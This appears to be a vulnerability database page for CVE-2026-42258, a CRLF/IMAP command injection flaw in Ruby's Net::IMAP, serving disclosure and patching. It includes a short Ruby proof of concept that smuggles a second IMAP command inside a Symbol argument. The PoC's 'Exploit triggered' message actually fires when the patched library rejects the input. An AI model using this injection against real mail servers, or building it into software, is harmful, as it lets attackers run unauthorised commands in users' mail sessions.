Security Vulnerability Report
CVE-2026-42258 CVSS 9.8 CRITICAL

Published: 2026-05-09 20:16:29
Last Modified: 2026-05-18 18:02:36

Description

Net::IMAP implements Internet Message Access Protocol (IMAP) client functionality in Ruby. Prior to versions 0.4.24, 0.5.14, and 0.6.4, symbol arguments to commands are vulnerable to a CRLF Injection / IMAP Command injection via Symbol arguments passed to IMAP commands. This issue has been patched in versions 0.4.24, 0.5.14, and 0.6.4.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ruby-lang:net\:\:imap:*:*:*:*:*:ruby:*:* - VULNERABLE (Ruby Net::IMAP < 0.4.24)
cpe:2.3:a:ruby-lang:net\:\:imap:*:*:*:*:*:ruby:*:* - VULNERABLE (Ruby Net::IMAP >= 0.5.0, < 0.5.14)
cpe:2.3:a:ruby-lang:net\:\:imap:*:*:*:*:*:ruby:*:* - VULNERABLE (Ruby Net::IMAP >= 0.6.0, < 0.6.4)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
ruby
require 'net/imap'

# Simulating a vulnerable scenario: connect to an IMAP server and authenticate
imap = Net::IMAP.new('imap.example.com')
imap.login('user', 'password')

# The vulnerability occurs when a Symbol containing CRLF is passed as a
# command argument. An attacker-controlled symbol smuggles a second command.
malicious_symbol = :"INBOX\r\nA001 LIST \"\" \"*\"\r\n"

# Before the patch, the symbol is written to the socket unescaped, so the
# server receives the SELECT INBOX line followed by an injected
# 'A001 LIST "" "*"' command. Patched versions reject the argument and raise
# instead of sending it, which is what the rescue branch below reports.
begin
  imap.select(malicious_symbol)
rescue => e
  puts "Exploit triggered: #{e.message}"
end

imap.disconnect

References

https://github.com/ruby/net-imap/releases/tag/v0.4.24 (Release Notes)
https://github.com/ruby/net-imap/releases/tag/v0.5.14 (Release Notes)
https://github.com/ruby/net-imap/releases/tag/v0.6.4 (Release Notes)
https://github.com/ruby/net-imap/security/advisories/GHSA-75xq-5h9v-w6px (Mitigation, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42258", "sourceIdentifier": "[email protected]", "published": "2026-05-09T20:16:28.623", "lastModified": "2026-05-18T18:02:35.790", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Net::IMAP implements Internet Message Access Protocol (IMAP) client functionality in Ruby. Prior to versions 0.4.24, 0.5.14, and 0.6.4, symbol arguments to commands are vulnerable to a CRLF Injection / IMAP Command injection via Symbol arguments passed to IMAP commands. This issue has been patched in versions 0.4.24, 0.5.14, and 0.6.4."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", 
"Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}, {"lang": "en", "value": "CWE-93"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ruby-lang:net\\:\\:imap:*:*:*:*:*:ruby:*:*", "versionEndExcluding": "0.4.24", "matchCriteriaId": "05DB8FF3-7546-470A-BBB4-4DCAEAD83D6F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ruby-lang:net\\:\\:imap:*:*:*:*:*:ruby:*:*", "versionStartIncluding": "0.5.0", "versionEndExcluding": "0.5.14", "matchCriteriaId": "2CCEB891-1D8F-4431-A79C-2A7560A84F4E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ruby-lang:net\\:\\:imap:*:*:*:*:*:ruby:*:*", "versionStartIncluding": "0.6.0", "versionEndExcluding": "0.6.4", "matchCriteriaId": "9A6D1995-BFA3-490F-967D-252CA7BE2264"}]}]}], "references": [{"url": "https://github.com/ruby/net-imap/releases/tag/v0.4.24", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/ruby/net-imap/releases/tag/v0.5.14", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/ruby/net-imap/releases/tag/v0.6.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/ruby/net-imap/security/advisories/GHSA-75xq-5h9v-w6px", "source": "[email protected]", "tags": 
["Mitigation", "Vendor Advisory"]}]}}